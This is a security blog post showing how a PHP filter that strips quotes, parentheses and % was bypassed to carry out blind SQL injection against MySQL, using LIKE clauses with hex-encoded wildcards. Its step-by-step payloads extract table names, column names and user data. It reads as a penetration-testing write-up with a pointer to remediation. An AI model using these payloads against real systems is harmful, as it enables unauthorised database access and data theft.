SQL Injection filter bypass to perform blind SQL Injection

Hello, in this blog post will discuss about a scenario in which web application was vulnerable to SQL Injection but user input was getting filter by code to remove characters such as ' " ( ) % etc.

Technology/back-end used by Web application 

1. PHP 
2. MySQL
   

Scenario:

The PHP code was accepting the user input through HTTP GET parameter "param1". The value was passing it to a custom data filtering function "input-filter".

The function "input-filter" is meant to perform filtering of some special characters which can lead to SQL Injection.
 

After performing input sensitization, function pass the data to SQL query in PHP code.
In SQL query, user data ($user_input) was getting passed as "Column name" in "select" statement as follow:

$query = mysqli_query($connection,"SELECT $user_input,time FROM stats WHERE depth = '$depth' ORDER BY times ASC");
 

Web application code was just processing the SQL query output and no output was shown on web interface. Due to this fact, union based SQL injection was not possible.

Web application code was not using "mysqli_error()" to show SQL server error messages which killed the chance to perform error based SQL Injection.

The only possibility was Blind SQL Injection. To perform blind SQL injection, there was limitation as web application "input-filter" function stripping out characters which are mentioned below:
" < > = ' ( ) & @ % # ;

When we use basic boolean based blind injection payload such as:

1 from dual where true and 1< ascii ( substring ( database (),1,1 ) )

After passing through user input filter function, payload was changing to the below mentioned one:

1 from dual where true and 1 ascii substring database ,1,1

URL encoded payload processing:

Web application user input filter function was stripping out % character as well which was making payload of no use.
Let's consider, URL encoding has been used for character ( and ), and payload is like this:

1 from dual where true and 1 %3C ascii %28 substring %28 database %28 %29 %2C 1 %2C 1 %29%29

After processing through user input filter function payload was becoming like this:

1 from dual where true and 1 3C ascii 28 substring 28 database 28 29 2C 1 2C 1 2929

Exploitation:

In this case, my way to perform exploitation was blind injection. To avoid stripping of payload characters, in combination of where condition, I used "like" clause with hex representation.

Like Clause and hex encoded wildcard search pattern:
Let's have a look on like clause functionality.

'Like' clause is such operator which has functionality to perform search in SQL database using wildcard search pattern.

For example, if user want to perform search for text in a column which has string 'user' in it anywhere, SQL query will be:

select column_name from table_name where value_in_column like '%user%'

The above-mentioned SQL query will retrieve the data from column which has string 'user' anywhere in it.

Like clause not just only take input in single quotes but also in hex form

Text Hex encoded value %user% 257573657225

Means, we can use SQL query with "like" clause and "hex encoded wildcard value" like this:

select column_name from table_name where value_in_column like 0x257573657225

Extracting tables and columns name

To perform exploitation in this scenario, I followed below mentioned things:

1. There is restriction not to use characters such as ' ( ) < > %
2. User input is getting pass to column name field in "select" statement, so used "1 from dual" to complete the "select" statement.
3. Use of "like" clause with hex encoded wildcard pattern.
4. Guess characters one-by-one
   

Table name extraction payload:

Consider, we have a table name value "auth".

Payload to look for table name "auth" (which has first character 'a') using like clause:

select table_name from information_schema.tables where table_name like 'a%' limit 0,1

Payload with hex encoded like clause wildcard value:

select table_name from information_schema.tables where table_name like 0x6125 limit 0,1

In my case, user data is getting pass as column name in SQL query, payload was: 

table_name from information_schema.tables where table_name like 0x6125 limit 0,1-- -

SQL query in application was executing as:

select table_name from information_schema.tables where table_name like 0x6125 limit 0,1-- - ,time FROM stats WHERE AND depth = '$depth' ORDER BY times ASC

 

Column name extraction payload:

Consider, we have a column name value "username" for table "auth".

Payload to look for column name "username" (which has first character 'u') using like clause of table "admin":

select column_name from information_schema.columns where table_name like 'auth' and column_name like 'u%' limit 0,1

Payload with hex encoded like clause wildcard value:

select column_name from information_schema.columns where table_name like 0x61757468 and column_name like 0x7525 limit 0,1

Data extraction payload:

To extract the data from column "username" of table "auth", use like clause with hex encoded wildcard apttern.

Payload to look for username "ace" in column "username" of table "auth" using like clause:

select username from auth where username like 'a%' limit 0,1

Payload with hex encoded like clause wildcard value:

select username from auth where username like 0x6125 limit 0,1

 

Conclusion:

SQL injection exploitation can be tricky but there may be a way to perform it.

Remediation:

To prevent SQL Injection attack, refer OWASP guide:

https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Thanks for reading :)

Special thanks to Sean Metcalf, OJ, hacker fantastic, A K Reddy,Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n,  Anurag Srivastava, James Kettle, vivek chauhan

--==[[ With Love from Team IndiShell ]]==--
                             

 --==[[ Greetz To ]]==--

############################################################################################

#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba

#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad

#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA

#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3

#############################################################################################

                             --==[[Love to]]==--

# My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir

#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)